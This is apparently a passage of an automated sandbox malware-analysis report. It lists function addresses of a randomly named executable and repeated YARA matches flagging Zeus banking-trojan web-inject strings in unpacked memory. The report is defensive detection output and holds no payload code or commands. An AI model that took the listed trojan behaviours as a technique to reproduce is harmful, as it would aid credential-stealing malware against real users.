Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_014282136_2_01428213
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0140F2D06_2_0140F2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0141B2D06_2_0141B2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013FD5706_2_013FD570
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01415CD06_2_01415CD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0141FCF06_2_0141FCF0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0141A4806_2_0141A480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_014244A06_2_014244A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0141BF406_2_0141BF40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_014087806_2_01408780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_014217806_2_01421780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0141F6206_2_0141F620
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_014166306_2_01416630
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0135E9706_2_0135E970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013858A06_2_013858A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137B8806_2_0137B880
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013810F06_2_013810F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013770D06_2_013770D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137D3406_2_0137D340
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01369B806_2_01369B80
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01377A306_2_01377A30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01380A206_2_01380A20
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01349D306_2_01349D30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01375C306_2_01375C30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01377C106_2_01377C10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137EC006_2_0137EC00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01349F506_2_01349F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01343FA06_2_01343FA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137DFA06_2_0137DFA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137F7906_2_0137F790
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0134F7E06_2_0134F7E0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013817C06_2_013817C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013896136_2_01389613
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013756506_2_01375650
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01382EDD6_2_01382EDD
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013706D06_2_013706D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_0137C6D06_2_0137C6D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015189308_2_01518930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015468108_2_01546810
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154D8008_2_0154D800
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015448308_2_01544830
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01518B508_2_01518B50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015503C08_2_015503C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151E3E08_2_0151E3E0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154E3908_2_0154E390
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01512BA08_2_01512BA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154CBA08_2_0154CBA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015442508_2_01544250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015582138_2_01558213
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153F2D08_2_0153F2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154B2D08_2_0154B2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152D5708_2_0152D570
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01545CD08_2_01545CD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154FCF08_2_0154FCF0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154A4808_2_0154A480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015544A08_2_015544A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154BF408_2_0154BF40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015387808_2_01538780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015517808_2_01551780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015466308_2_01546630
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154F6208_2_0154F620
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014CE9708_2_014CE970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E70D08_2_014E70D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F10F08_2_014F10F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EB8808_2_014EB880
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F58A08_2_014F58A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014ED3408_2_014ED340
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014D9B808_2_014D9B80
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F0A208_2_014F0A20
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E7A308_2_014E7A30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B9D308_2_014B9D30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EEC008_2_014EEC00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E7C108_2_014E7C10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E5C308_2_014E5C30
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B9F508_2_014B9F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F17C08_2_014F17C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014BF7E08_2_014BF7E0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EF7908_2_014EF790
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014B3FA08_2_014B3FA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EDFA08_2_014EDFA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E56508_2_014E5650
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F96138_2_014F9613
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014F2EDD8_2_014F2EDD
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014E06D08_2_014E06D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_014EC6D08_2_014EC6D0
Source: C:\Users\user\Desktop\uavINoSIQh.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
Source: uavINoSIQh.exeStatic PE information: Number of sections : 13 > 10
Source: svchost.exe.0.drStatic PE information: Number of sections : 13 > 10
Source: uavINoSIQh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.svchost.exe.26a3c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e440000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.79.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.56.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.75.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
